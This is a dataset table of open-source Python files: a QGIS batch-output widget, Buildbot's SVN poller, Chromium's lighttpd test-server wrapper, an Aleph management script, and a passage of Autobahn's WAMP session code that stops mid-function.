repo_name stringlengths 6 100 | path stringlengths 4 294 | copies stringlengths 1 5 | size stringlengths 4 6 | content stringlengths 606 896k | license stringclasses 15
values |
|---|---|---|---|---|---|
wbyne/QGIS | python/plugins/processing/gui/BatchOutputSelectionPanel.py | 2 | 6990 | # -*- coding: utf-8 -*-
"""
***************************************************************************
BatchOutputSelectionPanel.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from __future__ import print_function
from builtins import str
from builtins import range
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
import re
from qgis.PyQt.QtWidgets import QWidget, QPushButton, QLineEdit, QHBoxLayout, QSizePolicy, QFileDialog
from qgis.PyQt.QtCore import QSettings
from processing.gui.AutofillDialog import AutofillDialog
from processing.core.parameters import ParameterMultipleInput
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterTable
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterSelection
from processing.core.parameters import ParameterFixedTable
from processing.core.outputs import OutputDirectory
class BatchOutputSelectionPanel(QWidget):
def __init__(self, output, alg, row, col, panel):
super(BatchOutputSelectionPanel, self).__init__(None)
self.alg = alg
self.row = row
self.col = col
self.output = output
self.panel = panel
self.table = self.panel.tblParameters
self.horizontalLayout = QHBoxLayout(self)
self.horizontalLayout.setSpacing(2)
self.horizontalLayout.setMargin(0)
self.text = QLineEdit()
self.text.setText('')
self.text.setMinimumWidth(300)
self.text.setSizePolicy(QSizePolicy.Expanding,
QSizePolicy.Expanding)
self.horizontalLayout.addWidget(self.text)
self.pushButton = QPushButton()
self.pushButton.setText('...')
self.pushButton.clicked.connect(self.showSelectionDialog)
self.horizontalLayout.addWidget(self.pushButton)
self.setLayout(self.horizontalLayout)
def showSelectionDialog(self):
if isinstance(self.output, OutputDirectory):
self.selectDirectory()
return
filefilter = self.output.getFileFilter(self.alg)
settings = QSettings()
if settings.contains('/Processing/LastBatchOutputPath'):
path = str(settings.value('/Processing/LastBatchOutputPath'))
else:
path = ''
filename, selectedFileFilter = QFileDialog.getSaveFileName(self,
self.tr('Save file'), path, filefilter)
# fix_print_with_import
print(filename, selectedFileFilter)
if filename:
if not filename.lower().endswith(
tuple(re.findall("\*(\.[a-z]{1,10})", filefilter))):
ext = re.search("\*(\.[a-z]{1,10})", selectedFileFilter)
if ext:
filename += ext.group(1)
settings.setValue('/Processing/LastBatchOutputPath', os.path.dirname(filename))
dlg = AutofillDialog(self.alg)
dlg.exec_()
if dlg.mode is not None:
try:
if dlg.mode == AutofillDialog.DO_NOT_AUTOFILL:
self.table.cellWidget(self.row,
self.col).setValue(filename)
elif dlg.mode == AutofillDialog.FILL_WITH_NUMBERS:
n = self.table.rowCount() - self.row
for i in range(n):
name = filename[:filename.rfind('.')] \
+ str(i + 1) + filename[filename.rfind('.'):]
self.table.cellWidget(i + self.row,
self.col).setValue(name)
elif dlg.mode == AutofillDialog.FILL_WITH_PARAMETER:
n = self.table.rowCount() - self.row
for i in range(n):
widget = self.table.cellWidget(i + self.row,
dlg.param)
param = self.alg.parameters[dlg.param]
if isinstance(param, (ParameterRaster,
ParameterVector, ParameterTable,
ParameterMultipleInput)):
s = str(widget.getText())
s = os.path.basename(s)
s = os.path.splitext(s)[0]
elif isinstance(param, ParameterBoolean):
s = str(widget.currentIndex() == 0)
elif isinstance(param, ParameterSelection):
s = str(widget.currentText())
elif isinstance(param, ParameterFixedTable):
s = str(widget.table)
else:
s = str(widget.text())
name = filename[:filename.rfind('.')] + s \
+ filename[filename.rfind('.'):]
self.table.cellWidget(i + self.row,
self.col).setValue(name)
except:
pass
def selectDirectory(self):
settings = QSettings()
if settings.contains('/Processing/LastBatchOutputPath'):
lastDir = str(settings.value('/Processing/LastBatchOutputPath'))
else:
lastDir = ''
dirName = QFileDialog.getExistingDirectory(self,
self.tr('Select directory'), lastDir, QFileDialog.ShowDirsOnly)
if dirName:
self.table.cellWidget(self.row, self.col).setValue(dirName)
settings.setValue('/Processing/LastBatchOutputPath', dirName)
def setValue(self, text):
return self.text.setText(text)
def getValue(self):
return str(self.text.text())
| gpl-2.0 |
shoelzer/buildbot | master/buildbot/changes/svnpoller.py | 6 | 17985 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
# Based on the work of Dave Peticolas for the P4poll
# Changed to svn (using xml.dom.minidom) by Niklaus Giger
# Hacked beyond recognition by Brian Warner
from __future__ import absolute_import
from __future__ import print_function
from future.moves.urllib.parse import quote_plus as urlquote_plus
from future.utils import text_type
import os
import xml.dom.minidom
from twisted.internet import defer
from twisted.internet import utils
from twisted.python import log
from buildbot import util
from buildbot.changes import base
from buildbot.util import bytes2NativeString
from buildbot.util import bytes2unicode
# these split_file_* functions are available for use as values to the
# split_file= argument.
def split_file_alwaystrunk(path):
return dict(path=path)
def split_file_branches(path):
# turn "trunk/subdir/file.c" into (None, "subdir/file.c")
# and "trunk/subdir/" into (None, "subdir/")
# and "trunk/" into (None, "")
# and "branches/1.5.x/subdir/file.c" into ("branches/1.5.x", "subdir/file.c")
# and "branches/1.5.x/subdir/" into ("branches/1.5.x", "subdir/")
# and "branches/1.5.x/" into ("branches/1.5.x", "")
pieces = path.split('/')
if len(pieces) > 1 and pieces[0] == 'trunk':
return (None, '/'.join(pieces[1:]))
elif len(pieces) > 2 and pieces[0] == 'branches':
return ('/'.join(pieces[0:2]), '/'.join(pieces[2:]))
else:
return None
def split_file_projects_branches(path):
# turn projectname/trunk/subdir/file.c into dict(project=projectname,
# branch=trunk, path=subdir/file.c)
if "/" not in path:
return None
project, path = path.split("/", 1)
f = split_file_branches(path)
if f:
info = dict(project=project, path=f[1])
if f[0]:
info['branch'] = f[0]
return info
return f
class SVNPoller(base.PollingChangeSource, util.ComparableMixin):
"""
Poll a Subversion repository for changes and submit them to the change
master.
"""
compare_attrs = ("repourl", "split_file",
"svnuser", "svnpasswd", "project",
"pollInterval", "histmax",
"svnbin", "category", "cachepath", "pollAtLaunch")
parent = None # filled in when we're added
last_change = None
loop = None
def __init__(self, repourl, split_file=None,
svnuser=None, svnpasswd=None,
pollInterval=10 * 60, histmax=100,
svnbin='svn', revlinktmpl='', category=None,
project='', cachepath=None, pollinterval=-2,
extra_args=None, name=None, pollAtLaunch=False):
# for backward compatibility; the parameter used to be spelled with 'i'
if pollinterval != -2:
pollInterval = pollinterval
if name is None:
name = repourl
base.PollingChangeSource.__init__(self, name=name,
pollInterval=pollInterval,
pollAtLaunch=pollAtLaunch)
if repourl.endswith("/"):
repourl = repourl[:-1] # strip the trailing slash
self.repourl = repourl
self.extra_args = extra_args
self.split_file = split_file or split_file_alwaystrunk
self.svnuser = svnuser
self.svnpasswd = svnpasswd
self.revlinktmpl = revlinktmpl
# include environment variables required for ssh-agent auth
self.environ = os.environ.copy()
self.svnbin = svnbin
self.histmax = histmax
self._prefix = None
self.category = category if callable(
category) else util.ascii2unicode(category)
self.project = util.ascii2unicode(project)
self.cachepath = cachepath
if self.cachepath and os.path.exists(self.cachepath):
try:
with open(self.cachepath, "r") as f:
self.last_change = int(f.read().strip())
log.msg("SVNPoller: SVNPoller(%s) setting last_change to %s" % (
self.repourl, self.last_change))
# try writing it, too
with open(self.cachepath, "w") as f:
f.write(str(self.last_change))
except Exception:
self.cachepath = None
log.msg(("SVNPoller: SVNPoller(%s) cache file corrupt or unwriteable; " +
"skipping and not using") % self.repourl)
log.err()
def describe(self):
return "SVNPoller: watching %s" % self.repourl
def poll(self):
# Our return value is only used for unit testing.
# we need to figure out the repository root, so we can figure out
# repository-relative pathnames later. Each REPOURL is in the form
# (ROOT)/(PROJECT)/(BRANCH)/(FILEPATH), where (ROOT) is something
# like svn://svn.twistedmatrix.com/svn/Twisted (i.e. there is a
# physical repository at /svn/Twisted on that host), (PROJECT) is
# something like Projects/Twisted (i.e. within the repository's
# internal namespace, everything under Projects/Twisted/ has
# something to do with Twisted, but these directory names do not
# actually appear on the repository host), (BRANCH) is something like
# "trunk" or "branches/2.0.x", and (FILEPATH) is a tree-relative
# filename like "twisted/internet/defer.py".
# our self.repourl attribute contains (ROOT)/(PROJECT) combined
# together in a way that we can't separate without svn's help. If the
# user is not using the split_file= argument, then self.repourl might
# be (ROOT)/(PROJECT)/(BRANCH) . In any case, the filenames we will
# get back from 'svn log' will be of the form
# (PROJECT)/(BRANCH)/(FILEPATH), but we want to be able to remove
# that (PROJECT) prefix from them. To do this without requiring the
# user to tell us how repourl is split into ROOT and PROJECT, we do an
# 'svn info --xml' command at startup. This command will include a
# <root> element that tells us ROOT. We then strip this prefix from
# self.repourl to determine PROJECT, and then later we strip the
# PROJECT prefix from the filenames reported by 'svn log --xml' to
# get a (BRANCH)/(FILEPATH) that can be passed to split_file() to
# turn into separate BRANCH and FILEPATH values.
# whew.
if self.project:
log.msg("SVNPoller: polling " + self.project)
else:
log.msg("SVNPoller: polling")
d = defer.succeed(None)
if not self._prefix:
d.addCallback(lambda _: self.get_prefix())
@d.addCallback
def set_prefix(prefix):
self._prefix = prefix
d.addCallback(self.get_logs)
d.addCallback(self.parse_logs)
d.addCallback(self.get_new_logentries)
d.addCallback(self.create_changes)
d.addCallback(self.submit_changes)
d.addCallback(self.finished_ok)
# eat errors
d.addErrback(log.err, 'SVNPoller: Error in while polling')
return d
def getProcessOutput(self, args):
# this exists so we can override it during the unit tests
d = utils.getProcessOutput(self.svnbin, args, self.environ)
return d
def get_prefix(self):
args = ["info", "--xml", "--non-interactive", self.repourl]
if self.svnuser:
args.append("--username=%s" % self.svnuser)
if self.svnpasswd is not None:
args.append("--password=%s" % self.svnpasswd)
if self.extra_args:
args.extend(self.extra_args)
d = self.getProcessOutput(args)
@d.addCallback
def determine_prefix(output):
try:
doc = xml.dom.minidom.parseString(output)
except xml.parsers.expat.ExpatError:
log.msg("SVNPoller: SVNPoller.get_prefix: ExpatError in '%s'"
% output)
raise
rootnodes = doc.getElementsByTagName("root")
if not rootnodes:
# this happens if the URL we gave was already the root. In this
# case, our prefix is empty.
self._prefix = ""
return self._prefix
rootnode = rootnodes[0]
root = "".join([c.data for c in rootnode.childNodes])
# root will be a unicode string
if not self.repourl.startswith(root):
log.msg(format="Got root %(root)r from `svn info`, but it is "
"not a prefix of the configured repourl",
repourl=self.repourl, root=root)
raise RuntimeError("Configured repourl doesn't match svn root")
prefix = self.repourl[len(root):]
if prefix.startswith("/"):
prefix = prefix[1:]
log.msg("SVNPoller: repourl=%s, root=%s, so prefix=%s" %
(self.repourl, root, prefix))
return prefix
return d
def get_logs(self, _):
args = []
args.extend(["log", "--xml", "--verbose", "--non-interactive"])
if self.svnuser:
args.extend(["--username=%s" % self.svnuser])
if self.svnpasswd is not None:
args.extend(["--password=%s" % self.svnpasswd])
if self.extra_args:
args.extend(self.extra_args)
args.extend(["--limit=%d" % (self.histmax), self.repourl])
d = self.getProcessOutput(args)
return d
def parse_logs(self, output):
# parse the XML output, return a list of <logentry> nodes
try:
doc = xml.dom.minidom.parseString(output)
except xml.parsers.expat.ExpatError:
log.msg(
"SVNPoller: SVNPoller.parse_logs: ExpatError in '%s'" % output)
raise
logentries = doc.getElementsByTagName("logentry")
return logentries
def get_new_logentries(self, logentries):
last_change = old_last_change = self.last_change
# given a list of logentries, calculate new_last_change, and
# new_logentries, where new_logentries contains only the ones after
# last_change
new_last_change = None
new_logentries = []
if logentries:
new_last_change = int(logentries[0].getAttribute("revision"))
if last_change is None:
# if this is the first time we've been run, ignore any changes
# that occurred before now. This prevents a build at every
# startup.
log.msg('SVNPoller: starting at change %s' % new_last_change)
elif last_change == new_last_change:
# an unmodified repository will hit this case
log.msg('SVNPoller: no changes')
else:
for el in logentries:
if last_change == int(el.getAttribute("revision")):
break
new_logentries.append(el)
new_logentries.reverse() # return oldest first
self.last_change = new_last_change
log.msg('SVNPoller: _process_changes %s .. %s' %
(old_last_change, new_last_change))
return new_logentries
def _get_text(self, element, tag_name):
try:
child_nodes = element.getElementsByTagName(tag_name)[0].childNodes
text = "".join([t.data for t in child_nodes])
except IndexError:
text = "unknown"
return text
def _transform_path(self, path):
if not path.startswith(self._prefix):
log.msg(format="SVNPoller: ignoring path '%(path)s' which doesn't"
"start with prefix '%(prefix)s'",
path=path, prefix=self._prefix)
return
relative_path = path[len(self._prefix):]
if relative_path.startswith("/"):
relative_path = relative_path[1:]
where = self.split_file(relative_path)
# 'where' is either None, (branch, final_path) or a dict
if not where:
return
if isinstance(where, tuple):
where = dict(branch=where[0], path=where[1])
return where
def create_changes(self, new_logentries):
changes = []
for el in new_logentries:
revision = text_type(el.getAttribute("revision"))
revlink = u''
if self.revlinktmpl and revision:
revlink = self.revlinktmpl % urlquote_plus(revision)
revlink = text_type(revlink)
log.msg("Adding change revision %s" % (revision,))
author = self._get_text(el, "author")
comments = self._get_text(el, "msg")
# there is a "date" field, but it provides localtime in the
# repository's timezone, whereas we care about buildmaster's
# localtime (since this will get used to position the boxes on
# the Waterfall display, etc). So ignore the date field, and
# addChange will fill in with the current time
branches = {}
try:
pathlist = el.getElementsByTagName("paths")[0]
except IndexError: # weird, we got an empty revision
log.msg("ignoring commit with no paths")
continue
for p in pathlist.getElementsByTagName("path"):
kind = p.getAttribute("kind")
action = p.getAttribute("action")
path = "".join([t.data for t in p.childNodes])
# Convert the path from unicode to bytes
path = path.encode("ascii")
# Convert path from bytes to native string. Needed for Python 3.
path = bytes2NativeString(path, "ascii")
if path.startswith("/"):
path = path[1:]
if kind == "dir" and not path.endswith("/"):
path += "/"
where = self._transform_path(path)
# if 'where' is None, the file was outside any project that
# we care about and we should ignore it
if where:
branch = where.get("branch", None)
filename = where["path"]
if branch not in branches:
branches[branch] = {
'files': [], 'number_of_directories': 0}
if filename == "":
# root directory of branch
branches[branch]['files'].append(filename)
branches[branch]['number_of_directories'] += 1
elif filename.endswith("/"):
# subdirectory of branch
branches[branch]['files'].append(filename[:-1])
branches[branch]['number_of_directories'] += 1
else:
branches[branch]['files'].append(filename)
if "action" not in branches[branch]:
branches[branch]['action'] = action
for key in ("repository", "project", "codebase"):
if key in where:
branches[branch][key] = where[key]
for branch in branches:
action = branches[branch]['action']
files = branches[branch]['files']
number_of_directories_changed = branches[
branch]['number_of_directories']
number_of_files_changed = len(files)
if action == u'D' and number_of_directories_changed == 1 and number_of_files_changed == 1 and files[0] == '':
log.msg("Ignoring deletion of branch '%s'" % branch)
else:
chdict = dict(
author=author,
# weakly assume filenames are utf-8
files=[bytes2unicode(f, 'utf-8', 'replace') for f in files],
comments=comments,
revision=revision,
branch=util.ascii2unicode(branch),
revlink=revlink,
category=self.category,
repository=util.ascii2unicode(
branches[branch].get('repository', self.repourl)),
project=util.ascii2unicode(
branches[branch].get('project', self.project)),
codebase=util.ascii2unicode(
branches[branch].get('codebase', None)))
changes.append(chdict)
return changes
@defer.inlineCallbacks
def submit_changes(self, changes):
for chdict in changes:
yield self.master.data.updates.addChange(src=u'svn', **chdict)
def finished_ok(self, res):
if self.cachepath:
with open(self.cachepath, "w") as f:
f.write(str(self.last_change))
log.msg("SVNPoller: finished polling %s" % res)
return res
| gpl-2.0 |
wuhengzhi/chromium-crosswalk | build/android/lighttpd_server.py | 30 | 9449 | #!/usr/bin/env python
#
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides a convenient wrapper for spawning a test lighttpd instance.
Usage:
lighttpd_server PATH_TO_DOC_ROOT
"""
import codecs
import contextlib
import httplib
import os
import random
import shutil
import socket
import subprocess
import sys
import tempfile
import time
from pylib import constants
from pylib import pexpect
class LighttpdServer(object):
"""Wraps lighttpd server, providing robust startup.
Args:
document_root: Path to root of this server's hosted files.
port: TCP port on the _host_ machine that the server will listen on. If
ommitted it will attempt to use 9000, or if unavailable it will find
a free port from 8001 - 8999.
lighttpd_path, lighttpd_module_path: Optional paths to lighttpd binaries.
base_config_path: If supplied this file will replace the built-in default
lighttpd config file.
extra_config_contents: If specified, this string will be appended to the
base config (default built-in, or from base_config_path).
config_path, error_log, access_log: Optional paths where the class should
place temprary files for this session.
"""
def __init__(self, document_root, port=None,
lighttpd_path=None, lighttpd_module_path=None,
base_config_path=None, extra_config_contents=None,
config_path=None, error_log=None, access_log=None):
self.temp_dir = tempfile.mkdtemp(prefix='lighttpd_for_chrome_android')
self.document_root = os.path.abspath(document_root)
self.fixed_port = port
self.port = port or constants.LIGHTTPD_DEFAULT_PORT
self.server_tag = 'LightTPD ' + str(random.randint(111111, 999999))
self.lighttpd_path = lighttpd_path or '/usr/sbin/lighttpd'
self.lighttpd_module_path = lighttpd_module_path or '/usr/lib/lighttpd'
self.base_config_path = base_config_path
self.extra_config_contents = extra_config_contents
self.config_path = config_path or self._Mktmp('config')
self.error_log = error_log or self._Mktmp('error_log')
self.access_log = access_log or self._Mktmp('access_log')
self.pid_file = self._Mktmp('pid_file')
self.process = None
def _Mktmp(self, name):
return os.path.join(self.temp_dir, name)
@staticmethod
def _GetRandomPort():
# The ports of test server is arranged in constants.py.
return random.randint(constants.LIGHTTPD_RANDOM_PORT_FIRST,
constants.LIGHTTPD_RANDOM_PORT_LAST)
def StartupHttpServer(self):
"""Starts up a http server with specified document root and port."""
# If we want a specific port, make sure no one else is listening on it.
if self.fixed_port:
self._KillProcessListeningOnPort(self.fixed_port)
while True:
if self.base_config_path:
# Read the config
with codecs.open(self.base_config_path, 'r', 'utf-8') as f:
config_contents = f.read()
else:
config_contents = self._GetDefaultBaseConfig()
if self.extra_config_contents:
config_contents += self.extra_config_contents
# Write out the config, filling in placeholders from the members of |self|
with codecs.open(self.config_path, 'w', 'utf-8') as f:
f.write(config_contents % self.__dict__)
if (not os.path.exists(self.lighttpd_path) or
not os.access(self.lighttpd_path, os.X_OK)):
raise EnvironmentError(
'Could not find lighttpd at %s.\n'
'It may need to be installed (e.g. sudo apt-get install lighttpd)'
% self.lighttpd_path)
self.process = pexpect.spawn(self.lighttpd_path,
['-D', '-f', self.config_path,
'-m', self.lighttpd_module_path],
cwd=self.temp_dir)
client_error, server_error = self._TestServerConnection()
if not client_error:
assert int(open(self.pid_file, 'r').read()) == self.process.pid
break
self.process.close()
if self.fixed_port or not 'in use' in server_error:
print 'Client error:', client_error
print 'Server error:', server_error
return False
self.port = self._GetRandomPort()
return True
def ShutdownHttpServer(self):
"""Shuts down our lighttpd processes."""
if self.process:
self.process.terminate()
shutil.rmtree(self.temp_dir, ignore_errors=True)
def _TestServerConnection(self):
# Wait for server to start
server_msg = ''
for timeout in xrange(1, 5):
client_error = None
try:
with contextlib.closing(httplib.HTTPConnection(
'127.0.0.1', self.port, timeout=timeout)) as http:
http.set_debuglevel(timeout > 3)
http.request('HEAD', '/')
r = http.getresponse()
r.read()
if (r.status == 200 and r.reason == 'OK' and
r.getheader('Server') == self.server_tag):
return (None, server_msg)
client_error = ('Bad response: %s %s version %s\n ' %
(r.status, r.reason, r.version) +
'\n '.join([': '.join(h) for h in r.getheaders()]))
except (httplib.HTTPException, socket.error) as client_error:
pass # Probably too quick connecting: try again
# Check for server startup error messages
ix = self.process.expect([pexpect.TIMEOUT, pexpect.EOF, '.+'],
timeout=timeout)
if ix == 2: # stdout spew from the server
server_msg += self.process.match.group(0) # pylint: disable=no-member
elif ix == 1: # EOF -- server has quit so giveup.
client_error = client_error or 'Server exited'
break
return (client_error or 'Timeout', server_msg)
@staticmethod
def _KillProcessListeningOnPort(port):
"""Checks if there is a process listening on port number |port| and
terminates it if found.
Args:
port: Port number to check.
"""
if subprocess.call(['fuser', '-kv', '%d/tcp' % port]) == 0:
# Give the process some time to terminate and check that it is gone.
time.sleep(2)
assert subprocess.call(['fuser', '-v', '%d/tcp' % port]) != 0, \
'Unable to kill process listening on port %d.' % port
@staticmethod
def _GetDefaultBaseConfig():
return """server.tag = "%(server_tag)s"
server.modules = ( "mod_access",
"mod_accesslog",
"mod_alias",
"mod_cgi",
"mod_rewrite" )
# default document root required
#server.document-root = "."
# files to check for if .../ is requested
index-file.names = ( "index.php", "index.pl", "index.cgi",
"index.html", "index.htm", "default.htm" )
# mimetype mapping
mimetype.assign = (
".gif" => "image/gif",
".jpg" => "image/jpeg",
".jpeg" => "image/jpeg",
".png" => "image/png",
".svg" => "image/svg+xml",
".css" => "text/css",
".html" => "text/html",
".htm" => "text/html",
".xhtml" => "application/xhtml+xml",
".xhtmlmp" => "application/vnd.wap.xhtml+xml",
".js" => "application/x-javascript",
".log" => "text/plain",
".conf" => "text/plain",
".text" => "text/plain",
".txt" => "text/plain",
".dtd" => "text/xml",
".xml" => "text/xml",
".manifest" => "text/cache-manifest",
)
# Use the "Content-Type" extended attribute to obtain mime type if possible
mimetype.use-xattr = "enable"
##
# which extensions should not be handle via static-file transfer
#
# .php, .pl, .fcgi are most often handled by mod_fastcgi or mod_cgi
static-file.exclude-extensions = ( ".php", ".pl", ".cgi" )
server.bind = "127.0.0.1"
server.port = %(port)s
## virtual directory listings
dir-listing.activate = "enable"
#dir-listing.encoding = "iso-8859-2"
#dir-listing.external-css = "style/oldstyle.css"
## enable debugging
#debug.log-request-header = "enable"
#debug.log-response-header = "enable"
#debug.log-request-handling = "enable"
#debug.log-file-not-found = "enable"
#### SSL engine
#ssl.engine = "enable"
#ssl.pemfile = "server.pem"
# Autogenerated test-specific config follows.
cgi.assign = ( ".cgi" => "/usr/bin/env",
".pl" => "/usr/bin/env",
".asis" => "/bin/cat",
".php" => "/usr/bin/php-cgi" )
server.errorlog = "%(error_log)s"
accesslog.filename = "%(access_log)s"
server.upload-dirs = ( "/tmp" )
server.pid-file = "%(pid_file)s"
server.document-root = "%(document_root)s"
"""
def main(argv):
server = LighttpdServer(*argv[1:])
try:
if server.StartupHttpServer():
raw_input('Server running at http://127.0.0.1:%s -'
' press Enter to exit it.' % server.port)
else:
print 'Server exit code:', server.process.exitstatus
finally:
server.ShutdownHttpServer()
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause |
mgax/aleph | aleph/manage.py | 3 | 1527 | from flask.ext.script import Manager
from flask.ext.assets import ManageAssets
from flask.ext.migrate import MigrateCommand
from aleph.core import archive
from aleph.model import db, CrawlState
from aleph.views import app, assets
from aleph.processing import make_pipeline, process_collection
from aleph.crawlers import crawl_source
from aleph.upgrade import upgrade as upgrade_, reset as reset_
manager = Manager(app)
manager.add_command('assets', ManageAssets(assets))
manager.add_command('db', MigrateCommand)
@manager.command
def crawl(source, force=False):
""" Execute the crawler for a given source specification. """
crawl_source(source, ignore_tags=force)
@manager.command
def flush(source):
""" Reset the crawler state for a given source specification. """
CrawlState.flush(source)
db.session.commit()
@manager.command
def process(collection_name, force=False):
""" Index all documents in the given collection. """
process_collection.delay(collection_name, overwrite=force)
@manager.command
def fixture(name):
""" Load a list fixture. """
# TODO: replace this whole thing with something more frameworky
from aleph.processing.fixtures import load_fixture
load_fixture(name)
@manager.command
def reset():
""" Delete and re-create the search index and database. """
reset_()
@manager.command
def upgrade():
""" Create or upgrade the search index and database. """
upgrade_()
def main():
manager.run()
if __name__ == "__main__":
main()
| mit |
markope/AutobahnPython | autobahn/wamp/protocol.py | 1 | 57431 | ###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from __future__ import absolute_import
import six
import txaio
import inspect
from autobahn import wamp
from autobahn.wamp import uri
from autobahn.wamp import message
from autobahn.wamp import types
from autobahn.wamp import role
from autobahn.wamp import exception
from autobahn.wamp.exception import ApplicationError, ProtocolError, SessionNotReady, SerializationError
from autobahn.wamp.interfaces import IApplicationSession # noqa
from autobahn.wamp.types import SessionDetails
from autobahn.wamp.keyring import EncryptedPayload
from autobahn.util import IdGenerator, ObservableMixin
from autobahn.wamp.request import \
Publication, \
Subscription, \
Handler, \
Registration, \
Endpoint, \
PublishRequest, \
SubscribeRequest, \
UnsubscribeRequest, \
CallRequest, \
InvocationRequest, \
RegisterRequest, \
UnregisterRequest
def is_method_or_function(f):
return inspect.ismethod(f) or inspect.isfunction(f)
class BaseSession(ObservableMixin):
"""
WAMP session base class.
This class implements :class:`autobahn.wamp.interfaces.ISession`.
"""
def __init__(self):
"""
"""
ObservableMixin.__init__(self)
# this is for library level debugging
self.debug = False
# this is for app level debugging. exceptions raised in user code
# will get logged (that is, when invoking remoted procedures or
# when invoking event handlers)
self.debug_app = False
# this is for marshalling traceback from exceptions thrown in user
# code within WAMP error messages (that is, when invoking remoted
# procedures)
self.traceback_app = False
# mapping of exception classes to WAMP error URIs
self._ecls_to_uri_pat = {}
# mapping of WAMP error URIs to exception classes
self._uri_to_ecls = {
ApplicationError.INVALID_PAYLOAD: SerializationError
}
# session authentication information
self._authid = None
self._authrole = None
self._authmethod = None
self._authprovider = None
# end-to-end encryption keyring
self._keyring = None
# generator for WAMP request IDs
self._request_id_gen = IdGenerator()
def define(self, exception, error=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.define`
"""
if error is None:
assert(hasattr(exception, '_wampuris'))
self._ecls_to_uri_pat[exception] = exception._wampuris
self._uri_to_ecls[exception._wampuris[0].uri()] = exception
else:
assert(not hasattr(exception, '_wampuris'))
self._ecls_to_uri_pat[exception] = [uri.Pattern(six.u(error), uri.Pattern.URI_TARGET_HANDLER)]
self._uri_to_ecls[six.u(error)] = exception
def _message_from_exception(self, request_type, request, exc, tb=None, enc_algo=None):
"""
Create a WAMP error message from an exception.
:param request_type: The request type this WAMP error message is for.
:type request_type: int
:param request: The request ID this WAMP error message is for.
:type request: int
:param exc: The exception.
:type exc: Instance of :class:`Exception` or subclass thereof.
:param tb: Optional traceback. If present, it'll be included with the WAMP error message.
:type tb: list or None
"""
assert(enc_algo is None or enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX)
args = None
if hasattr(exc, 'args'):
args = list(exc.args) # make sure tuples are made into lists
kwargs = None
if hasattr(exc, 'kwargs'):
kwargs = exc.kwargs
if tb:
if kwargs:
kwargs['traceback'] = tb
else:
kwargs = {'traceback': tb}
if isinstance(exc, exception.ApplicationError):
error = exc.error if type(exc.error) == six.text_type else six.u(exc.error)
else:
if exc.__class__ in self._ecls_to_uri_pat:
error = self._ecls_to_uri_pat[exc.__class__][0]._uri
else:
error = u"wamp.error.runtime_error"
encrypted_payload = None
if self._keyring:
encrypted_payload = self._keyring.encrypt(False, error, args, kwargs)
if encrypted_payload:
msg = message.Error(request_type,
request,
error,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
msg = message.Error(request_type,
request,
error,
args,
kwargs)
return msg
def _exception_from_message(self, msg):
"""
Create a user (or generic) exception from a WAMP error message.
:param msg: A WAMP error message.
:type msg: instance of :class:`autobahn.wamp.message.Error`
"""
# FIXME:
# 1. map to ecls based on error URI wildcard/prefix
# 2. extract additional args/kwargs from error URI
exc = None
enc_err = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
log_msg = u"received encrypted payload, but no keyring active"
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_NO_KEYRING_ACTIVE, log_msg, enc_algo=msg.enc_algo)
else:
try:
encrypted_payload = EncryptedPayload(msg.enc_algo, msg.enc_key, msg.enc_serializer, msg.payload)
decrypted_error, msg.args, msg.kwargs = self._keyring.decrypt(True, msg.error, encrypted_payload)
except Exception as e:
log_msg = u"failed to decrypt application payload 1: {}".format(e)
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_DECRYPT_ERROR, log_msg, enc_algo=msg.enc_algo)
else:
if msg.error != decrypted_error:
log_msg = u"URI within encrypted payload ('{}') does not match the envelope ('{}')".format(decrypted_error, msg.error)
self.log.warn(log_msg)
enc_err = ApplicationError(ApplicationError.ENC_TRUSTED_URI_MISMATCH, log_msg, enc_algo=msg.enc_algo)
if enc_err:
return enc_err
if msg.error in self._uri_to_ecls:
ecls = self._uri_to_ecls[msg.error]
